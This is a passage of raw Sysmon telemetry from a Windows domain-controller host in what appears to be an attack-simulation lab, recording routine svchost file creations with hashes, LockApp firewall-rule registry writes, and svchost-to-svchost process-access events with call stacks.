AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache131420250026721327.txtMD5=35CB8C19D2035D2165E1EFA7FA0ADF70,SHA256=5DCC967527060112D9824F3C852F5F1344613C12F2BEEAAF6D67A901E00B615F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9FA2AD00-9DCB-419C-A829-3001D4EAD2D6}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C95EB080-5351-417D-B73F-63D6EDD2B1EA}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9808827F-09C5-4EE8-8B23-F28BBE9AB914}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.850{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3052D7F-90DE-4715-96BB-3BC0F6717376}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 23542300x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache131420249992652675.txtMD5=35CB8C19D2035D2165E1EFA7FA0ADF70,SHA256=5DCC967527060112D9824F3C852F5F1344613C12F2BEEAAF6D67A901E00B615F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingssynonyms.txtMD5=9239D33BCC9C55C4D97DCAE64A7E2F5B,SHA256=D147C9B76ACC226324DEF206D680C3368109018BE254FD1399C8E2ED2C3D77E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingsglobals.txtMD5=D2D6B108ED635B192276F2E13160BB9F,SHA256=598A2674BE811C1256B0E18311CE5CBA2A542D0965FF4A0AC96173CE78A4C575,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.850 23542300x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingsconversions.txtMD5=F21F68AB0FD9BF5B4255EDDDE72BE816,SHA256=9034FBD5F370A37A2E43CAE5D482B84D3ED9B6C62C6DDBC4BEE25B0526AD25EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settings.schemaMD5=AC68AC6BFFD26DBEA6B7DBD00A19A3DD,SHA256=D6BDEAA9BC0674AE9E8C43F2E9F68A2C7BB8575B3509685B481940FDA834E031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settings.csgMD5=A97FD910ECCB1049B949DF2B6D0EA605,SHA256=B84B14439AD5607B15A96B922CD63EA6C8CB1281BF3B84037C5CE90FBEB29766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appssynonyms.txtMD5=E86D86E41327A21E2448076DD6C97A81,SHA256=A3DC890A9E3D99D3336455F0CFD94ACCAAD69242D0A1C8649AC82B8E1F8BB6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appsglobals.txtMD5=5925E930562DA940101DE785C1CBC5B3,SHA256=B6C3C8B85CECB5743E5A62C706152F83606B5690F0926B5CC16D29CBFE3ED39B,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1932E67E94B41E878381D8D2CE15118,SHA256=94DF502EF884F8A14ECCF8B38573020DE35D42A004D76AEBA32A09A93D7173BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 